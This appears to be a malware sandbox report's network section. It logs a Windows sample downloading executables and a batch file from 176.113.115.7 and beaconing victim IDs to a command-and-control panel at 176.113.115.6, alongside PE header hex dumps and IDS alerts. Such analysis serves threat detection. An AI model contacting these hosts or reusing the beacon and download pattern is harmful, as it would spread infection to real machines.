00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4c 00 00 04 00 00 6a 32 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 fa 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fa 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6f 78 65 70 68 79 6c 00 10 1a 00 00 f0 31 00 00 10 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6b 6f 75 63 72 70 6a 00 10 00 00 00 00 4c 00 00 04 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4c 00 00 22 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:41:55 GMTETag: "2cc200-62fc4237594c2"Accept-Ranges: bytesContent-Length: 2933248Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 f0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 30 00 00 04 00 00 aa 43 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 d2 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 06 00 00 02 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 e4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 7a 75 6c 79 71 62 6e 00 c0 29 00 00 20 06 00 00 b4 29 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 63 75 66 72 6d 6d 69 00 10 00 00 00 e0 2f 00 00 06 00 00 00 9a 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 2f 00 00 22 00 00 00 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4c 00 00 04 00 00 6a 32 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 fa 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fa 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6f 78 65 70 68 79 6c 00 10 1a 00 00 f0 31 00 00 10 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6b 6f 75 63 72 70 6a 00 10 00 00 00 00 4c 00 00 04 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4c 00 00 22 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:53:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4c 00 00 04 00 00 6a 32 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 fa 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fa 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6f 78 65 70 68 79 6c 00 10 1a 00 00 f0 31 00 00 10 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6b 6f 75 63 72 70 6a 00 10 00 00 00 00 4c 00 00 04 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4c 00 00 22 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                      Source: global trafficHTTP traffic detected: GET /files/7222648325/2qv26zF.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128520101&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128540101&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128550101&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128560101&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128570101&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveHost: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128580101&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 38 35 39 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10128590121&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/teamex_support/random.exe HTTP/1.1Host: 176.113.115.7
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
                      Source: Joe Sandbox ViewIP Address: 176.113.115.6 176.113.115.6
                      Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                      Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49692 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49695 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49699 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49703 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49702 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49700 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49698 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49730 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 176.113.115.7:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49793 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49804 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49779 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49806 -> 188.114.96.3:443
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.201.147
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.201.147
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
